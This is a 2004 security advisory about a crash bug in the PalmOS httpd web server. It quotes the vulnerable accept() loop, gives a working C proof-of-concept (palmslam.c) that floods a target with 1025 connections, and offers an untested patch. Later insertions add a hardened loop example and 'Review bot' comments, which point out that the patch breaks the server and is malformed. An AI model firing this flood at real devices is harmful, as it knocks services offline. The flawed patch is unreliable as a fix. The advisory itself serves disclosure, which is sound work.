[NEWS] PalmOS httpd accept() Queue Overflow DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 02/11/04

    To: list@securiteam.com
    Date: 11 Feb 2004 11:05:25 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      PalmOS httpd accept() Queue Overflow DoS
    ------------------------------------------------------------------------

    SUMMARY

    'httpd' for PalmOS, originally written by Jim Rees, is a simple web server
    for Palm-powered PDAs. Development of httpd for Palm has stopped. Shaun
    Colley modified 'httpd' slightly and re-released it on freshmeat.net. httpd
    contains a bug that causes the device to crash with a "Fatal Error".

    DETAILS

    The bug allows an attacker to crash the entire device, causing a "Fatal
    Error" and rendering it unusable until it is completely reset. PalmOS can
    only handle 1 client connection, but 'httpd' implements a while(1) loop
    that accept()s connections forever. Because of this, httpd will accept more
    than 1 connection, which PalmOS literally cannot do. The result is a
    dialog box saying "Fatal Error, NetStack1.c overflowed accept queue",
    with a "Reset" button.

    Vulnerable Code:
    From httpd.c:
    [snip]
    /* Cause of the bug is here! PalmOS can only accept 1 client connection! */
    while (1) {
            if (f) {
                xclose(f);
                f = NULL;
            }
            if (fd >= 0) {
                close(fd);
                fd = -1;
            }
            /* Accept connections */
            len = sizeof saddr;
            AppNetTimeout = SysTicksPerSecond() * 1;
            if ((fd = accept(sfd, (struct sockaddr *)&saddr, &len)) < 0) {
    [snip]
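    The same accept loop in a hardened form, as an added example that is not part of the advisory or of httpd: the loop is bounded instead of while (1) and the previous client is always closed before the next accept(), and a small loopback harness (assumption: a POSIX host stands in for PalmOS; serve_bounded, run_demo and the client counts are names and values chosen here) shows the server accepting only as many clients as it is allowed to.

```c
#include <unistd.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hardened form of the advisory's accept loop: bounded instead of while (1),
 * and the previous client is always closed before the next accept(), so the
 * server itself never holds more than one client. Returns the number served. */
int serve_bounded(int sfd, int max_clients) {
    int served = 0, fd = -1;
    while (served < max_clients) {
        struct sockaddr_in saddr;
        socklen_t len = sizeof saddr;
        if (fd >= 0) { close(fd); fd = -1; }          /* one client at a time */
        if ((fd = accept(sfd, (struct sockaddr *)&saddr, &len)) < 0) break;
        served++;
    }
    if (fd >= 0) close(fd);
    return served;
}

/* Demo harness (assumption: a POSIX host stands in for PalmOS): listen on
 * loopback with the smallest backlog, fork a client that opens n connections
 * back to back (a constructed stand-in for palmslam's burst), and report how
 * many the bounded server accepted before it stopped. */
int run_demo(int n, int max_clients) {
    struct sockaddr_in sa = {0};
    socklen_t len = sizeof sa;
    int sfd = socket(AF_INET, SOCK_STREAM, 0), served, i, c;
    pid_t pid;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);     /* port 0: kernel picks one */
    if (sfd < 0 || bind(sfd, (struct sockaddr *)&sa, len) < 0 || listen(sfd, 1) < 0 ||
        getsockname(sfd, (struct sockaddr *)&sa, &len) < 0) return -1;
    if ((pid = fork()) == 0) {
        close(sfd);                    /* the child must not keep the listener alive */
        for (i = 0; i < n; i++) {
            if ((c = socket(AF_INET, SOCK_STREAM, 0)) < 0) break;
            (void)connect(c, (struct sockaddr *)&sa, len); /* refused once server stops */
            close(c);
        }
        _exit(0);
    }
    if (pid < 0) { close(sfd); return -1; }
    served = serve_bounded(sfd, max_clients);
    close(sfd);
    waitpid(pid, NULL, 0);
    return served;
}
```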

    PoC:
    //palmslam.c
    /* PalmOS httpd accept queue overflow PoC exploit.
     * Compile: gcc palmslam.c -o palmslam
     *
     * -shaun2k2
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #define MAX_CON 1025
    int main(int argc, char *argv[]) {
            int sock[MAX_CON];
            int i;
            struct sockaddr_in dest[MAX_CON];
            struct hostent *host;
            if(argc < 3) {
                    printf("Usage: palmslam <host> <port>\n");
                    exit(-1);
            }
            /* gethostbyname() returns NULL (not -1) on failure */
            if((host = gethostbyname(argv[1])) == NULL) {
                    printf("Couldn't resolve %s!\n", argv[1]);
                    exit(-1);
            }
            /* open MAX_CON connections; "i < MAX_CON" because the original
             * "<=" wrote one element past both arrays */
            for(i = 0; i < MAX_CON; i++) {
                    if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                            printf("Couldn't create socket!\n");
                            exit(-1);
                    }
                    memset(&dest[i], 0, sizeof(dest[i]));
                    dest[i].sin_family = AF_INET;
                    dest[i].sin_port = htons(atoi(argv[2]));
                    memcpy(&dest[i].sin_addr, host->h_addr_list[0], host->h_length);
                    if(connect(sock[i], (struct sockaddr*)&dest[i],
                               sizeof(struct sockaddr)) == -1) {
                            printf("Couldn't connect to %s on port %s!\n",
                                   argv[1], argv[2]);
                            exit(-1);
                    }
                    printf("%d : Connected!\n", i);
            }
            return(0);
    }

    Patch Availability:
    ---httpd.patch
    --- httpd.c 2004-01-14 17:21:41.000000000 +0000
    +++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
    @@ -391,8 +391,15 @@
         NetLibAddrINToA(AppNetRefnum,
    ifinfo.param.interfaceInfo.ipAddr, host);
         printf("Listening on %s\n", host);

    - while (1) {
    - if (f) {
    + /* Here is where the bug manifests: PalmOS can
    only take 1 client
    + * connection (according to even the PalmOS
    programming documentation),
    + * but this loop accept()s connections forever.
    The loop is now commented
    + * out, fixing the bug.
    + * -Shaun2k2
    + */
    +
    + /*while (1) {*/
    + if (f) {
                xclose(f);
                f = NULL;
            }
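    Review bot: commenting out `while (1) {` rather than bounding it changes httpd from a server into a one-shot program: the `if (f) { xclose(f); f = NULL; }` body that follows now runs exactly once, so after the first client the code falls through to the end of the former loop. If the intent is to keep serving clients one at a time, keep the loop and rely on closing the previous client before each accept() (the `if (f)` block already does this) instead of deleting it. Separately, as rendered here the new comment block is line-wrapped: `only take 1 client`, `programming documentation),` and `The loop is now commented` carry no leading `+`, so `patch` will reject this hunk unless those fragments are rejoined to the preceding `+` lines.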
    @@ -507,7 +514,7 @@
         }

         printf("stopped\n");
    -}
    +/*}*/

     char html0[] = "HTTP/1.0 200 OK\nMIME-version: 1.0\nContent-type:
    %s\n\n";
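    Review bot: `/*}*/` pairs with the `/*while (1) {*/` in the first hunk, so the braces still balance, but any `break` or `continue` in the roughly 115 lines between the two hunks (old lines 391 to 507) would no longer sit inside a loop and would fail to compile, and the advisory itself says the patch was never tested; it should be built once before publication, and the fact that `printf("stopped\n")` now executes after a single client is a behaviour change that belongs in the patch description.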

    ---
    To apply the patch, run 'patch httpd.c httpd.patch' and then type 'make'
    to recompile httpd. Shaun Colley did not test the patch.

    ADDITIONAL INFORMATION

    The information has been provided by Shaun Colley <shaunige@yahoo.co.uk>.
